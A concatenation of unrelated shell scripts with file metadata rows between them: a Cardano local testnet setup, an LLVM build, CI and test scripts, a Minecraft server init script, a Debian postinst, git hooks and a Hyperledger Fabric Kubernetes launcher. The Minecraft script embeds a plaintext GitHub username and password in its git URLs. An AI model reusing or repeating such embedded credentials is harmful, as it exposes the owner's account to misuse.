# 'LastKnownBlockVersion-Major: 2', and restart the nodes
# - post another proposal + vote to go to protocol version 2
#uncomment this for an automatic transition after the first epoch
# echo "TestShelleyHardForkAtEpoch: 1" >> ${ROOT}/configuration.yaml
#uncomment this to trigger the hardfork with protocol version 1
#echo "TestShelleyHardForkAtVersion: 1" >> ${ROOT}/configuration.yaml
pushd ${ROOT}
# create the node directories
for NODE in ${ALL_NODES}; do
mkdir "${NODE}" "${NODE}/byron" "${NODE}/shelley"
done
# Make topology files
#TODO generalise this over the N BFT nodes and pool nodes
cat > node-bft1/topology.json <<EOF
{
"Producers": [
{
"addr": "127.0.0.1",
"port": 3002,
"valency": 1
}
, {
"addr": "127.0.0.1",
"port": 3003,
"valency": 1
}
]
}
EOF
echo 3001 > node-bft1/port
cat > node-bft2/topology.json <<EOF
{
"Producers": [
{
"addr": "127.0.0.1",
"port": 3001,
"valency": 1
}
, {
"addr": "127.0.0.1",
"port": 3003,
"valency": 1
}
]
}
EOF
echo 3002 > node-bft2/port
cat > node-pool1/topology.json <<EOF
{
"Producers": [
{
"addr": "127.0.0.1",
"port": 3001,
"valency": 1
}
, {
"addr": "127.0.0.1",
"port": 3002,
"valency": 1
}
]
}
EOF
echo 3003 > node-pool1/port
cat > byron.genesis.spec.json <<EOF
{
"heavyDelThd": "300000000000",
"maxBlockSize": "2000000",
"maxTxSize": "4096",
"maxHeaderSize": "2000000",
"maxProposalSize": "700",
"mpcThd": "20000000000000",
"scriptVersion": 0,
"slotDuration": "1000",
"softforkRule": {
"initThd": "900000000000000",
"minThd": "600000000000000",
"thdDecrement": "50000000000000"
},
"txFeePolicy": {
"multiplier": "43946000000",
"summand": "155381000000000"
},
"unlockStakeEpoch": "18446744073709551615",
"updateImplicit": "10000",
"updateProposalThd": "100000000000000",
"updateVoteThd": "1000000000000"
}
EOF
cardano-cli byron genesis genesis \
--protocol-magic ${NETWORK_MAGIC} \
--start-time "${START_TIME}" \
--k ${SECURITY_PARAM} \
--n-poor-addresses 0 \
--n-delegate-addresses ${NUM_BFT_NODES} \
--total-balance ${INIT_SUPPLY} \
--delegate-share 1 \
--avvm-entry-count 0 \
--avvm-entry-balance 0 \
--protocol-parameters-file byron.genesis.spec.json \
--genesis-output-dir byron
mv byron.genesis.spec.json byron/genesis.spec.json
# Symlink the BFT operator keys from the genesis delegates, for uniformity
for N in ${BFT_NODES_N}; do
ln -s ../../byron/delegate-keys.00$((${N} - 1)).key "node-bft${N}/byron/delegate.key"
ln -s ../../byron/delegation-cert.00$((${N} - 1)).json "node-bft${N}/byron/delegate.cert"
done
# Create keys, addresses and transactions to withdraw the initial UTxO into
# regular addresses.
for N in ${BFT_NODES_N}; do
cardano-cli byron key keygen \
--secret byron/payment-keys.00$((${N} - 1)).key \
cardano-cli byron key signing-key-address \
--testnet-magic 42 \
--secret byron/payment-keys.00$((${N} - 1)).key > byron/address-00$((${N} - 1))
cardano-cli byron key signing-key-address \
--testnet-magic 42 \
--secret byron/genesis-keys.00$((${N} - 1)).key > byron/genesis-address-00$((${N} - 1))
cardano-cli byron transaction issue-genesis-utxo-expenditure \
--genesis-json byron/genesis.json \
--testnet-magic 42 \
--tx tx$((${N} - 1)).tx \
--wallet-key byron/delegate-keys.00$((${N} - 1)).key \
--rich-addr-from "$(head -n 1 byron/genesis-address-00$((${N} - 1)))" \
--txout "(\"$(head -n 1 byron/address-00$((${N} - 1)))\", $FUNDS_PER_BYRON_ADDRESS)"
done
# Update Proposal and votes
cardano-cli byron governance create-update-proposal \
--filepath update-proposal \
--testnet-magic 42 \
--signing-key byron/delegate-keys.000.key \
--protocol-version-major 1 \
--protocol-version-minor 0 \
--protocol-version-alt 0 \
--application-name "cardano-sl" \
--software-version-num 1 \
--system-tag "linux" \
--installer-hash 0
for N in ${BFT_NODES_N}; do
cardano-cli byron governance create-proposal-vote \
--proposal-filepath update-proposal \
--testnet-magic 42 \
--signing-key byron/delegate-keys.00$((${N} - 1)).key \
--vote-yes \
--output-filepath update-vote.00$((${N} - 1))
done
cardano-cli byron governance create-update-proposal \
--filepath update-proposal-1 \
--testnet-magic 42 \
--signing-key byron/delegate-keys.000.key \
--protocol-version-major 2 \
--protocol-version-minor 0 \
--protocol-version-alt 0 \
--application-name "cardano-sl" \
--software-version-num 1 \
--system-tag "linux" \
--installer-hash 0
for N in ${BFT_NODES_N}; do
cardano-cli byron governance create-proposal-vote \
--proposal-filepath update-proposal-1 \
--testnet-magic 42 \
--signing-key byron/delegate-keys.00$((${N} - 1)).key \
--vote-yes \
--output-filepath update-vote-1.00$((${N} - 1))
done
echo "====================================================================="
echo "Generated genesis keys and genesis files:"
echo
ls -1 byron/*
echo "====================================================================="
# Set up our template
mkdir shelley
cardano-cli genesis create --testnet-magic 42 --genesis-dir shelley
# Then edit the genesis.spec.json ...
# We're going to use really quick epochs (300 seconds), by using short slots 0.2s
# and K=10, but we'll keep long KES periods so we don't have to bother
# cycling KES keys
sed -i shelley/genesis.spec.json \
-e 's/"slotLength": 1/"slotLength": 0.1/' \
-e 's/"activeSlotsCoeff": 5.0e-2/"activeSlotsCoeff": 0.1/' \
-e 's/"securityParam": 2160/"securityParam": 10/' \
-e 's/"epochLength": 432000/"epochLength": 500/' \
-e 's/"maxLovelaceSupply": 0/"maxLovelaceSupply": 1000000000000/' \
-e 's/"decentralisationParam": 1.0/"decentralisationParam": 0.7/' \
-e 's/"major": 0/"major": 5/' \
-e 's/"rho": 0.0/"rho": 0.1/' \
-e 's/"tau": 0.0/"tau": 0.1/' \
-e 's/"updateQuorum": 5/"updateQuorum": 2/'
# Now generate for real:
cardano-cli genesis create \
--testnet-magic 42 \
--genesis-dir shelley/ \
--gen-genesis-keys ${NUM_BFT_NODES} \
--gen-utxo-keys 1
cardano-cli stake-address key-gen \
--verification-key-file shelley/utxo-keys/utxo-stake.vkey \
--signing-key-file shelley/utxo-keys/utxo-stake.skey
cardano-cli address key-gen \
--verification-key-file shelley/utxo-keys/utxo2.vkey \
--signing-key-file shelley/utxo-keys/utxo2.skey
cardano-cli stake-address key-gen \
--verification-key-file shelley/utxo-keys/utxo2-stake.vkey \
--signing-key-file shelley/utxo-keys/utxo2-stake.skey
echo "====================================================================="
echo "Generated genesis keys and genesis files:"
echo
ls -1 shelley/*
echo "====================================================================="
echo "Generated shelley/genesis.json:"
echo
cat shelley/genesis.json
echo
echo "====================================================================="
# Make the pool operator cold keys
# This was done already for the BFT nodes as part of the genesis creation
for NODE in ${POOL_NODES}; do
cardano-cli node key-gen \
--cold-verification-key-file ${NODE}/shelley/operator.vkey \
--cold-signing-key-file ${NODE}/shelley/operator.skey \
--operational-certificate-issue-counter-file ${NODE}/shelley/operator.counter
cardano-cli node key-gen-VRF \
--verification-key-file ${NODE}/shelley/vrf.vkey \
--signing-key-file ${NODE}/shelley/vrf.skey
done
# Symlink the BFT operator keys from the genesis delegates, for uniformity
for N in ${BFT_NODES_N}; do
ln -s ../../shelley/delegate-keys/delegate${N}.skey node-bft${N}/shelley/operator.skey
ln -s ../../shelley/delegate-keys/delegate${N}.vkey node-bft${N}/shelley/operator.vkey
ln -s ../../shelley/delegate-keys/delegate${N}.counter node-bft${N}/shelley/operator.counter
ln -s ../../shelley/delegate-keys/delegate${N}.vrf.vkey node-bft${N}/shelley/vrf.vkey
ln -s ../../shelley/delegate-keys/delegate${N}.vrf.skey node-bft${N}/shelley/vrf.skey
done
# Make hot keys and for all nodes
for NODE in ${ALL_NODES}; do
cardano-cli node key-gen-KES \
--verification-key-file ${NODE}/shelley/kes.vkey \
--signing-key-file ${NODE}/shelley/kes.skey
cardano-cli node issue-op-cert \
--kes-period 0 \
--kes-verification-key-file ${NODE}/shelley/kes.vkey \
--cold-signing-key-file ${NODE}/shelley/operator.skey \
--operational-certificate-issue-counter-file ${NODE}/shelley/operator.counter \
--out-file ${NODE}/shelley/node.cert
done
echo "Generated node operator keys (cold, hot) and operational certs:"
echo
ls -1 ${ALL_NODES}
echo "====================================================================="
# Make some payment and stake addresses
# user1..n: will own all the funds in the system, we'll set this up from
# initial utxo the
# pool-owner1..n: will be the owner of the pools and we'll use their reward
# account for pool rewards
USER_ADDRS="user1"
POOL_ADDRS="pool-owner1"
ADDRS="${USER_ADDRS} ${POOL_ADDRS}"
mkdir addresses
for ADDR in ${ADDRS}; do
# Payment address keys
cardano-cli address key-gen \
--verification-key-file addresses/${ADDR}.vkey \
--signing-key-file addresses/${ADDR}.skey
# Stake address keys
cardano-cli stake-address key-gen \
--verification-key-file addresses/${ADDR}-stake.vkey \
--signing-key-file addresses/${ADDR}-stake.skey
# Payment addresses
cardano-cli address build \
--payment-verification-key-file addresses/${ADDR}.vkey \
--stake-verification-key-file addresses/${ADDR}-stake.vkey \
--testnet-magic 42 \
--out-file addresses/${ADDR}.addr
# Stake addresses
cardano-cli stake-address build \
--stake-verification-key-file addresses/${ADDR}-stake.vkey \
--testnet-magic 42 \
--out-file addresses/${ADDR}-stake.addr
# Stake addresses registration certs
cardano-cli stake-address registration-certificate \
--stake-verification-key-file addresses/${ADDR}-stake.vkey \
--out-file addresses/${ADDR}-stake.reg.cert
done
# user N will delegate to pool N
USER_POOL_N="1"
for N in ${USER_POOL_N}; do
# Stake address delegation certs
cardano-cli stake-address delegation-certificate \
--stake-verification-key-file addresses/user${N}-stake.vkey \
--cold-verification-key-file node-pool${N}/shelley/operator.vkey \
--out-file addresses/user${N}-stake.deleg.cert
ln -s ../addresses/pool-owner${N}-stake.vkey node-pool${N}/owner.vkey
ln -s ../addresses/pool-owner${N}-stake.skey node-pool${N}/owner.skey
done
echo "Generated payment address keys, stake address keys,"
echo "stake address regitration certs, and stake address delegatation certs"
echo
ls -1 addresses/
echo "====================================================================="
# Next is to make the stake pool registration cert
for NODE in ${POOL_NODES}; do
cardano-cli stake-pool registration-certificate \
--testnet-magic 42 \
--pool-pledge 0 --pool-cost 0 --pool-margin 0 \
--cold-verification-key-file ${NODE}/shelley/operator.vkey \
--vrf-verification-key-file ${NODE}/shelley/vrf.vkey \
--reward-account-verification-key-file ${NODE}/owner.vkey \
--pool-owner-stake-verification-key-file ${NODE}/owner.vkey \
--out-file ${NODE}/registration.cert
done
echo "Generated stake pool registration certs:"
ls -1 node-*/registration.cert
echo "====================================================================="
echo "So you can now do various things:"
echo " * Start the nodes"
echo " * Initiate successive protocol updates"
echo " * Query the node's ledger state"
echo
echo "To start the nodes, in separate terminals use the following scripts:"
echo
mkdir -p run
for NODE in ${BFT_NODES}; do
(
echo "#!/usr/bin/env bash"
echo ""
echo "cardano-node run \\"
echo " --config ${ROOT}/configuration.yaml \\"
echo " --topology ${ROOT}/${NODE}/topology.json \\"
echo " --database-path ${ROOT}/${NODE}/db \\"
echo " --socket-path '$(sprocket "${ROOT}/${NODE}/node.sock")' \\"
echo " --shelley-kes-key ${ROOT}/${NODE}/shelley/kes.skey \\"
echo " --shelley-vrf-key ${ROOT}/${NODE}/shelley/vrf.skey \\"
echo " --shelley-operational-certificate ${ROOT}/${NODE}/shelley/node.cert \\"
echo " --port $(cat ${NODE}/port) \\"
echo " --delegation-certificate ${ROOT}/${NODE}/byron/delegate.cert \\"
echo " --signing-key ${ROOT}/${NODE}/byron/delegate.key \\"
echo " | tee -a ${ROOT}/${NODE}/node.log"
) > run/${NODE}.sh
chmod a+x run/${NODE}.sh
echo $ROOT/run/${NODE}.sh
done
for NODE in ${POOL_NODES}; do
(
echo "#!/usr/bin/env bash"
echo ""
echo "cardano-node run \\"
echo " --config ${ROOT}/configuration.yaml \\"
echo " --topology ${ROOT}/${NODE}/topology.json \\"
echo " --database-path ${ROOT}/${NODE}/db \\"
echo " --socket-path '$(sprocket "${ROOT}/${NODE}/node.sock")' \\"
echo " --shelley-kes-key ${ROOT}/${NODE}/shelley/kes.skey \\"
echo " --shelley-vrf-key ${ROOT}/${NODE}/shelley/vrf.skey \\"
echo " --shelley-operational-certificate ${ROOT}/${NODE}/shelley/node.cert \\"
echo " --port $(cat ${NODE}/port) \\"
echo " | tee -a ${ROOT}/${NODE}/node.log"
) > run/${NODE}.sh
chmod a+x run/${NODE}.sh
echo $ROOT/run/${NODE}.sh
done
echo "#!/usr/bin/env bash" > run/all.sh
echo "" >> run/all.sh
chmod a+x run/all.sh
for NODE in ${BFT_NODES}; do
echo "$ROOT/run/${NODE}.sh &" >> run/all.sh
done
for NODE in ${POOL_NODES}; do
echo "$ROOT/run/${NODE}.sh &" >> run/all.sh
done
echo "" >> run/all.sh
echo "wait" >> run/all.sh
chmod a+x run/all.sh
echo
echo "Alternatively, you can run all the nodes in one go:"
echo
echo "$ROOT/run/all.sh"
echo
echo "In order to do the protocol updates, proceed as follows:"
echo
echo " 0. wait for the nodes to start producing blocks"
echo " 1. invoke ./scripts/byron-to-alonzo/update-1.sh"
echo " wait for the next epoch for the update to take effect"
echo
echo " 2. invoke ./scripts/byron-to-alonzo/update-2.sh"
echo " 3. restart the nodes"
echo " wait for the next epoch for the update to take effect"
echo
echo " 4. invoke ./scripts/byron-to-alonzo/update-3.sh <N>"
echo " Here, <N> the current epoch (2 if you're quick)."
echo " If you provide the wrong epoch, you will see an error"
echo " that will tell you the current epoch, and can run"
echo " the script again."
echo " 5. restart the nodes"
echo " wait for the next epoch for the update to take effect"
echo " 6. invoke ./scripts/byron-to-alonzo/update-4.sh <N>"
echo " 7. restart the nodes"
echo
echo "You can observe the status of the updates by grepping the logs, via"
echo
echo " grep LedgerUpdate ${ROOT}/node-pool1/node.log"
echo
echo "When in Shelley (after 3, and before 4), you should be able "
echo "to look at the protocol parameters, or the ledger state, "
echo "using commands like"
echo
echo "CARDANO_NODE_SOCKET_PATH=${ROOT}/node-bft1/node.sock \\"
echo " cardano-cli query protocol-parameters \\"
echo " --cardano-mode --testnet-magic 42"
echo
echo "This will fail outside of the Shelley era. In particular, "
echo "after step 3, you will get an error message that tells you "
echo "that you are in the Allegra era. You must then use the --allegra-era flag:"
echo
echo "CARDANO_NODE_SOCKET_PATH=${ROOT}/node-bft1/node.sock \\"
echo " cardano-cli query protocol-parameters \\"
echo " --cardano-mode --allegra-era --testnet-magic 42"
echo
echo "Similarly, use --mary-era in the Mary era."
popd
# For an automatic transition at epoch 0, specifying mary, allegra or shelley
# will start the node in the appropriate era.
echo ""
# These are needed for cardano-submit-api
echo "EnableLogMetrics: False" >> ${ROOT}/configuration.yaml
echo "EnableLogging: True" >> ${ROOT}/configuration.yaml
if [ "$1" = "alonzo" ]; then
echo "TestShelleyHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
echo "TestAllegraHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
echo "TestMaryHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
echo "TestAlonzoHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
echo "TestEnableDevelopmentHardForkEras: True" >> ${ROOT}/configuration.yaml
echo "TestEnableDevelopmentNetworkProtocols: True" >> ${ROOT}/configuration.yaml
sed -i ${ROOT}/configuration.yaml \
-e 's/LastKnownBlockVersion-Major: 1/LastKnownBlockVersion-Major: 5/'
# Copy the cost model
mkdir ${ROOT}/shelley/alonzo
cp configuration/cardano/alonzo/shelley_qa_cost-model.json ${ROOT}/shelley/alonzo/costmodel.json
echo "Nodes will start in Alonzo era from epoch 0"
elif [ "$1" = "mary" ]; then
echo "TestShelleyHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
echo "TestAllegraHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
echo "TestMaryHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
sed -i ${ROOT}/configuration.yaml \
-e 's/LastKnownBlockVersion-Major: 1/LastKnownBlockVersion-Major: 4/'
echo "Nodes will start in Mary era from epoch 0"
elif [ "$1" = "allegra" ]; then
echo "TestShelleyHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
echo "TestAllegraHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
sed -i ${ROOT}/configuration.yaml \
-e 's/LastKnownBlockVersion-Major: 1/LastKnownBlockVersion-Major: 3/'
echo "Nodes will start in Allegra era from epoch 0"
elif [ "$1" = "shelley" ]; then
echo "TestShelleyHardForkAtEpoch: 0" >> ${ROOT}/configuration.yaml
sed -i ${ROOT}/configuration.yaml \
-e 's/LastKnownBlockVersion-Major: 1/LastKnownBlockVersion-Major: 2/'
echo "Nodes will start in Shelley era from epoch 0"
else
echo "Default yaml configuration applied."
fi
| true |
1ede94debada6af03249685c438e333a7ef2717e | Shell | phoenixlabcn/fortran-ios | /build_llc.sh | UTF-8 | 347 | 2.765625 | 3 | [] | no_license | #!/bin/bash
cd classic-flang-llvm-project
mkdir -p build
cd build
if [ ! -e "LLVM.xcodeproj" ]; then
cmake -G Xcode ../llvm
fi
BIN_PATH="Debug/bin/llc"
if [ ! -e "$BIN_PATH" ]; then
xcodebuild ONLY_ACTIVE_ARCH=NO -scheme llc -sdk macosx build SYMROOT=../../build_llc
fi
rm -rf ../../build_llc
yes | cp -rf "$BIN_PATH" ../../build/bin
| true |
f408bc27e5e84933e38c089cb6df6bb0b546ab8a | Shell | albertywu/buildkite | /flow.sh | UTF-8 | 445 | 2.796875 | 3 | [] | no_license | #!/bin/bash
set -ex
. utils.sh
cat ~/.docker/config.json
# volume-mount a yarn cache dir, to prevent excessive uNPM calls
util_install_yarn_cache_tarball $PROJECT
# get the yarn cache directory inside the docker container
YARN_CACHE_DIR=$(docker run --rm "$BUILD_IMAGE" bash -c 'yarn cache dir')
docker run -v ${PWD}/.yarn_cache:$YARN_CACHE_DIR -i --rm $BUILD_IMAGE bash <<CMD
jazelle ci --cwd $PROJECT
jazelle flow --cwd $PROJECT
CMD
| true |
628e91656a77f61cace1f5d91769aff1b3cebaf1 | Shell | ErwanAliasr1/skydive | /scripts/ci/tripleo-tests.sh | UTF-8 | 1,509 | 3.03125 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
set -e
USERNAME=skydive
PASSWORD=secret
. ~/stackrc
CTLIP=$( openstack server show overcloud-controller-0 -f json | jq -r .addresses | cut -d '=' -f 2 )
AGENTS_COUNT=$( SKYDIVE_ANALYZERS=$CTLIP:8082 /home/stack/skydive client status --username $USERNAME --password $PASSWORD | jq '.Agents | length' )
if [ $AGENTS_COUNT -lt 2 ]; then
echo Expected agent count not found
SKYDIVE_ANALYZERS=$CTLIP:8082 /home/stack/skydive client status --username $USERNAME --password $PASSWORD
exit 1
fi
. ~/overcloudrc
curl -o /tmp/cirros.img http://download.cirros-cloud.net/0.4.0/cirros-0.4.0-x86_64-disk.img
openstack image create --public --file /tmp/cirros.img --disk-format raw cirros
openstack flavor create --vcpus 1 --ram 64 --disk 1 --public tiny
NETID=$( openstack network create private -f json | jq -r .id )
openstack subnet create --subnet-range 10.0.0.0/24 --network $NETID private
# FIX(safchain) currenlty openstack volume client is broken, so can't boot a VM
# will restore it once fixed
#openstack server create --image cirros --flavor tiny --nic net-id=$NETID vm1
# for now, one ns with dhcp agent, on container for the dhcp agent, one ns for the network created and
# one tap for the network as well.
EXPECTED=4
for i in {1..30}; do
INTF_COUNT=$( SKYDIVE_ANALYZERS=$CTLIP:8082 \
/home/stack/skydive client query "G.V().Has('Manager', 'neutron').Count()" --username $USERNAME --password $PASSWORD )
if [ $INTF_COUNT -eq $EXPECTED ]; then
exit 0
fi
sleep 5
done
exit 1
| true |
6059fa823d9f8b56a02326a6c215b04de90f9217 | Shell | 1484-minecraft/1.15.2 | /manager | UTF-8 | 4,147 | 3.5625 | 4 | [] | no_license | #!/bin/bash
# /etc/init.d/minecraft
# Author by Nav Vasky
# Modified by KJie
### BEGIN INIT INFO
# Provides: MineCraft
# Required-Start: $local_fs $remote_fs screen-cleanup
# Required-Stop: $local_fs $remote_fs
# Should-Start: $network
# Should-Stop: $network
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: MineCraft server
# Description: Starts the MineCraft server
### END INIT INFO
#Settings
SERVICE='spigot.jar' #The name of the jar file used to boot the server, also the name of the process
SCREENNAME='minecraft' #The name screen will use
OPTIONS='nogui' #Optional arguments for MineCraft
USERNAME='tom2003611' #The user name of the Linux account to be used
WORLD='world' #The selected world to load when the server boots
# MCPATH="/home/$USERNAME/server/$1/" #The file path for the directory where the server jar is held
MCPATH="./" #The file path for the directory where the server jar is held
MAXHEAP=2048 #The maximum amount of ram allocated to the server
MINHEAP=1572 #The minimum amount of ram allocated to the server
# INVOCATION="java -Xms${MINHEAP}M -Xmx${MAXHEAP}M -XX:+UseConcMarkSweepGC -jar $SERVICE $OPTIONS"
INVOCATION="java -Xms${MINHEAP}M -Xmx${MAXHEAP}M -jar $SERVICE $OPTIONS"
ME=`whoami`
#Checks if the correct user is executing the service, if not, try to switch user
#Starts the MineCraft Server
mc_start() {
if pgrep -u $ME -f $SERVICE > /dev/null #Checks if the server is already running
then
echo "$SERVICE is already running!"
else
git pull https://1484-minecraft:staythefuckathome@github.com/1484-minecraft/1.15.2
echo "Starting $SERVICE..."
cd $MCPATH
cd $MCPATH && tmux new-session -d -s $SCREENNAME $INVOCATION #Starts the server
sleep 3
if pgrep -u $ME -f $SERVICE > /dev/null #Checks if the service started or not
then
echo "$SERVICE is now running."
else
echo "Error! Could not start $SERVICE!"
fi
fi
}
#Turns off saving of the server
mc_saveoff() {
if pgrep -u $ME -f $SERVICE > /dev/null
then #Checks if the server is running, then it alerts the users
echo "$SERVICE is running... suspending saves"
tmux send-keys -t $SCREENNAME "say SERVER BACKUP STARTING. Server going readonly" ENTER
tmux send-keys -t $SCREENNAME "save-off" ENTER
tmux send-keys -t $SCREENNAME "save-all" ENTER
sync
sleep 10
else
echo "$SERVICE is not running. Not suspending saves."
fi
}
#Turns on the saving of the server
mc_saveon() {
if pgrep -u $ME -f $SERVICE > /dev/null
then #Checks if the server is running, then it alerts the users
echo "$SERVICE is running... re-enabling saves"
tmux send-keys -t $SCREENNAME "save-on" ENTER
tmux send-keys -t $SCREENNAME "say SERVER BACKUP ENDED. Server going read-write..." ENTER
else
echo "$SERVICE is not running. Not resuming saves."
fi
}
#Stops the server
mc_stop() {
if pgrep -u $ME -f $SERVICE > /dev/null
then #Alerts the users on the server of incoming server shut down
echo "Stopping $SERVICE"
tmux send-keys -t $SCREENNAME "say SERVER SHUTTING DOWN IN 10 SECONDS. Saving map..." ENTER
tmux send-keys -t $SCREENNAME "save-all" ENTER
tmux send-keys -t $SCREENNAME "" ENTER
# sleep 10
tmux send-keys -t $SCREENNAME "stop" ENTER
# sleep 7
while /usr/bin/pgrep -u $ME -f $SERVICE > /dev/null; do :; done
echo "$SERVICE is stopped."
else
echo "$SERVICE was not running."
fi
# if pgrep -u $ME -f $SERVICE > /dev/null #Checks if the server is still running
# then
# echo "Error! $SERVICE could not be stopped."
# else
# echo "$SERVICE is stopped."
# fi
git add --all
git commit -m 'update'
git push https://1484-minecraft:staythefuckathome@github.com/1484-minecraft/1.15.2
}
#Start-Stop here
case "$1" in
start)
mc_start
;;
stop)
mc_stop
;;
restart)
mc_stop
mc_start
;;
status)
if pgrep -u $ME -f $SERVICE > /dev/null
then
echo "$SERVICE is running."
else
echo "$SERVICE is not running."
fi
;;
*)
echo "Usage: $0 {start|stop|backup|status|restart|command \"server command\"}"
exit 1
;;
esac
exit 0
| true |
630bbbe7ea9ab9efb41bb93867def6190355dd9e | Shell | FauxFaux/debian-control | /k/kopano-webapp/kopano-webapp-common_3.5.0+dfsg1-1_all/postinst | UTF-8 | 1,661 | 3.5 | 4 | [] | no_license | #!/bin/sh
# postinst script for kopano-webapp
# see: dh_installdeb(1)
# summary of how this script can be called:
# --- $1 --- --- $2 --- --- $3 --- --- $4 ---
# <new-postinst> 'configure' <most-recently-configured-version>
# <old-postinst> 'abort-upgrade' <new version>
# <conflictor's-postinst> 'abort-remove' 'in-favour' <package> <new-version>
# <postinst> 'abort-remove'
# <deconfigured's-postinst> 'abort-deconfigure' 'in-favour' <failed-install-package> <version> 'removing' <conflicting-package> <version>
#
# for details, see http://www.debian.org/doc/debian-policy/ or the
# debian-policy package
set -e
#set -x # uncomment for verbose output
PACKAGE_NAME="kopano-webapp"
PACKAGE_ETC_FOLDER="/etc/kopano/webapp"
PACKAGE_VAR_FOLDER="/var/lib/kopano-webapp/tmp"
case "$1" in
configure)
# check permissions on /var/lib/kopano-webapp/tmp
#dpkg-statoverride --add --update www-data www-data 0750 ${PACKAGE_VAR_FOLDER}
# check first for snakeoil key and certificate
echo "Updating default SSL certificate settings, if any..." >&2
if [ ! -e "/etc/ssl/certs/ssl-cert-snakeoil.pem" ] || \
[ ! -e "/etc/ssl/private/ssl-cert-snakeoil.key" ];
then
echo "Create snakeoil CA and key for kopano-webapp ..." >&2
make-ssl-cert generate-default-snakeoil
fi
;;
abort-upgrade|abort-remove|abort-deconfigure)
;;
*)
echo "postinst called with unknown argument \`$1'" >&2
exit 1
;;
esac
exit 0
| true |
15cb85a2867c2e69d036a020b9c22815a8a65675 | Shell | wuding-card/Wuding-legacy | /.husky/prepare-commit-msg | UTF-8 | 528 | 3.28125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
. "$(dirname "$0")/_/husky.sh"
if [[ "$OSTYPE" == "msys" ]]; then
# Windows workaround for <https://github.com/carloscuesta/gitmoji-cli/issues/211>
sum1=$(md5sum .git/COMMIT_EDITMSG)
echo calling gitmoji
wt --window 0 -p cmd -d "$(pwd)" pwsh -NoProfile -Command "npx gitmoji --hook .git/COMMIT_EDITMSG"
while true
do
sum2=$(md5sum .git/COMMIT_EDITMSG)
if [ "$sum1" == "$sum2" ];
then
sleep 1
else
break
fi
done
else
exec < /dev/tty && npx gitmoji --hook $1 $2 || true
fi
| true |
79328362eaedda36070f6367d6d931ec8d3529df | Shell | ndonolli/mySite | /publish.sh | UTF-8 | 539 | 3.359375 | 3 | [] | no_license | #!/bin/bash
# Script to automatically publish the site to the github pages repo
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" # gets directory of this bash script
if [[ $PWD != $DIR ]]
then
echo "Error: Current working directory is not the main website repo directory"
exit 1
fi
hugo -t hemingway
cd "${PWD}/public"
git add .
git commit -m "site build $(date)"
ssh-agent bash -c "ssh-add /Users/ndonolli/.ssh/id_rsa; git push origin master"
cd ..
git add public
git commit -m "site build $(date)"
git push origin master
| true |
7239d2b06f5518822c9972102314f2bb6966b588 | Shell | TuckerHaydon/config | /exe/install_all.sh | UTF-8 | 357 | 3.34375 | 3 | [] | no_license | #!/bin/bash
# Determine location of this file
CONFIG_DIR="$(realpath $( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )/../)"
# Helper variables
EXE_DIR="${CONFIG_DIR}/exe"
# Install submodules
cd ${CONFIG_DIR}
git submodule update --init --recursive
# Install components
cd ${EXE_DIR}
./install_vim.sh
./install_tmux.sh
./install_zsh.sh
| true |
2726bbb63726dbcf563c464cde6e3b13343ebdf9 | Shell | AfzaalLucky/hlf-k8s-custom-crypto | /start-fabric.sh | UTF-8 | 2,994 | 3.109375 | 3 | [] | no_license | #!/bin/bash
# This script brings up a local version of the Hyperledger Fabric Network.
echo "============== Starting Fabric Services ================"
echo "- Creating Fabric Supporting Services"
echo ""
echo " - Zookepeer Services: kubectl create -f fabric-zookeeper0-service.yaml"
kubectl create -f fabric-zookeeper0-service.yaml
echo " - Zookeeper Deployments: kubectl create -f fabric-zookeeper0-deployment.yaml"
kubectl create -f fabric-zookeeper0-deployment.yaml
echo " - Zookepeer Services: kubectl create -f fabric-zookeeper1-service.yaml"
kubectl create -f fabric-zookeeper1-service.yaml
echo " - Zookeeper Deployments: kubectl create -f fabric-zookeeper1-deployment.yaml"
kubectl create -f fabric-zookeeper1-deployment.yaml
echo " - Zookepeer Services: kubectl create -f fabric-zookeeper2-service.yaml"
kubectl create -f fabric-zookeeper2-service.yaml
echo " - Zookeeper Deployments: kubectl create -f fabric-zookeeper2-deployment.yaml"
kubectl create -f fabric-zookeeper2-deployment.yaml
echo " - [waiting 5s]"
sleep 5
echo " - Kafka Services: kubectl create -f fabric-kafka0-service.yaml"
kubectl create -f fabric-kafka0-service.yaml
echo " - Kafka Deployments: kubectl create -f fabric-kafka0-deployment.yaml"
kubectl create -f fabric-kafka0-deployment.yaml
echo " - Kafka Services: kubectl create -f fabric-kafka1-service.yaml"
kubectl create -f fabric-kafka1-service.yaml
echo " - Kafka Deployments: kubectl create -f fabric-kafka1-deployment.yaml"
kubectl create -f fabric-kafka1-deployment.yaml
echo " - Kafka Services: kubectl create -f fabric-kafka2-service.yaml"
kubectl create -f fabric-kafka2-service.yaml
echo " - Kafka Deployments: kubectl create -f fabric-kafka2-deployment.yaml"
kubectl create -f fabric-kafka2-deployment.yaml
echo " - Kafka Services: kubectl create -f fabric-kafka3-service.yaml"
kubectl create -f fabric-kafka3-service.yaml
echo " - Kafka Deployments: kubectl create -f fabric-kafka3-deployment.yaml"
kubectl create -f fabric-kafka3-deployment.yaml
# Create couchdb
echo " - CouchDb Service: kubectl create -f fabric-couchdb.yaml"
kubectl create -f fabric-couchdb.yaml
echo " - [waiting 5s]"
sleep 5s
# Create Orderer
echo " - Orderer Service: kubectl create -f fabric-orderer.yaml"
kubectl create -f fabric-orderer.yaml
echo " - [waiting 5s]"
sleep 5s
echo "- Creating Fabric Services..."
for S_FABRIC_SERVICE in fabric-peer0-org1.yaml \
fabric-peer1-org1.yaml \
fabric-peer0-org2.yaml \
fabric-peer1-org2.yaml
do
echo " - Creating Service ${S_FABRIC_SERVICE}: kubectl create -f ${S_FABRIC_SERVICE}"
kubectl create -f ${S_FABRIC_SERVICE}
done
echo ""
echo " - [waiting 20s for Fabric network nodes to sync ]"
